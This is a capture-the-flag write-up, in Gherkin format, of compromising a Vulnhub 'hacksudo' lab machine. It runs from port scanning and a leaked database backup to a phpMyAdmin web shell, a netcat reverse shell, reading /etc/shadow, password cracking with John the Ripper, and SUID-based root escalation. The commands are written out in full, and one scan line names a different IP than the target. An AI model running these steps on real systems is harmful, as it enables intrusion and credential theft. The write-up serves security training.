## Version 1.4.1
## language: en
Feature:
  TOE:
    Vulnhub
  Location:
    192.168.199.133
  CWE:
    CWE-0078: OS Command Injection
  Rule:
    REQ.173 Discard unsafe inputs
  Goal:
    Get the remote connection with root privileges
  Recommendation:
    Sanitize every input

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | kali-linux      | 2020.4      |
    | VMware          | 16.1.0      |
    | Nmap            | 7.70        |
    | Metasploit      | 5.0.4       |
    | Dirsearch       | 0.4.1       |
    | John the Ripper | 1.9.0       |
    | hashID          | 3.1.4       |
  TOE information:
    Given a file with the .OVA file extension
    Then I run it on VMware
    And I see the login screen of debian and the 'hacksudo' username
    And I am using kali-linux

  Scenario: Normal use case
    Given The site at 192.168.199.133:9000 is phpMyAdmin
    Then an authorized user can manage the database from there

  Scenario: Static detection
    Given I don't have access to the source code
    Then This can't be done

  Scenario: Dynamic detection
    Given a machine running on VMware
    When I use nmap to scan for devices on the local network
    """
    nmap -sP 192.168.199.0/24
    """
    And I get the result
    """
    Nmap scan report for 192.168.199.133
    Host is up (0.00017s latency)
    """
    Then I knew that 192.168.199.133 was the target machine's IP address
    When I scan with Nmap for open ports
    """
    $ nmap -A -vv -T4 -p- 192.168.199.131
    PORT      STATE SERVICE VERSION
    22/tcp    open  ssh     OpenSSH 7.9p1
    80/tcp    open  http    Apache httpd 2.4.38 (Debian)
    9000/tcp  open  http    Apache httpd 2.4.38 (Debian)
    |_http-server-header: Apache/2.4.38
    |_http-title: phpMyAdmin
    """
    And I go to the website on port 80 [evidence](website.png)
    But I don't find anything interesting
    When I use dirsearch against the website [evidence](dirsearch.png)
    And I go to <<192.168.199.133/backup/>>
    And I download the file <<mysql.bak>>
    Then I can see the database credentials [evidence](backup.png)
    When I go to the website at port 9000
    And I see the phpMyAdmin login screen
    Then I can conclude that anyone can access remotely

  Scenario: Exploitation
    Given The port 9000 is open and running phpMyAdmin
    And The credentials of the user 'vishal'
    When I use the given credentials
    Then I can see the database administrator panel [evidence](myadmin.png)
    When I start to look at all the databases
    And I find 'hacksudo' is empty
    And I find the users table at <<mysql > Tables > Users>>
    Then I can see the hash for the root user [evidence](hash.png)
    When I use Hash-ID to identify the hash
    """
    Possible Hashs:
    [+] MySQL 160bit - SHA-1(SHA-1($pass))
    """
    And I try to decrypt it
    But It wasn't possible
    When I search for 'reverse shell on phpMyAdmin'
    And I read an article from NetSPI
    """
    https://blog.netspi.com/linux-hacking-case-studies-part-3-phpmyadmin/
    """
    Then I go to the SQL query tab on the 'hacksudo' database
    When I use a payload based on
    """
    https://github.com/nullbind/Other-Projects/blob/master/random/
    phpMyAdminWebShell.sql
    """
    And I see a confirmation of the execution [evidence](payload.png)
    Then I go to <<192.168.199.133/shell.php>>
    And I can use the shell [evidence](shell.png)
    When I open netcat on the Kali terminal
    And I use the following code on the web-shell
    """
    nc 192.168.199.129 -e/bin/bash
    """
    Then I have a netcat shell as user 'www-data'
    When I search for SUID files with
    """
    find / -perm -u=s -type f 2>/dev/null
    """
    And I see
    """
    /usr/bin/date
    """
    Then I search it on GTFOBins
    """
    https://gtfobins.github.io/gtfobins/date/#suid
    """
    And I use
    """
    LFILE=/etc/shadow
    date -f $LFILE
    """
    When I copy the content of the shadow file for the user 'hacksudo'
    And I also copy the content of the passwd file using
    """
    cat /etc/passwd
    """
    Then I combine bot files using
    """
    unshadow passwd.txt shadow.txt > passwords.txt
    """
    When I use John the Ripper to decrypt it
    """
    john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
    """
    Then I get the hacksudo password [evidence](john.png)
    And I use <<su hacksudo>> and the password to change my user
    And I can take the first flag [evidence](userflag.png)
    When I search across the directories
    And I see the following at /Downloads
    """
    -rwsrwsrws  1 root    root  23072 Apr 3 13:28 cpulimit
    """
    And I search for it at GTFOBins
    """
    https://gtfobins.github.io/gtfobins/cpulimit/#suid
    """
    Then I use
    """
    ./cpulimit -l 100 -f -- /bin/sh -p
    """
    And I got a session as root
    When I go to /root
    Then I can see the root flag [evidence](root.png)

  Scenario: Remediation
    Given the database, administration page is susceptible to Command Injection
    Then filter the content of every user input

  Scenario: Scoring
  Base: Attributes that are constants over time and organizations
    9.8/10 (Critical) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  Temporal: Attributes that measure the exploit's popularity and fixability
    9.1/10 (Critical) - E:F/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    9.1/10 (Critical) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2021-04-13
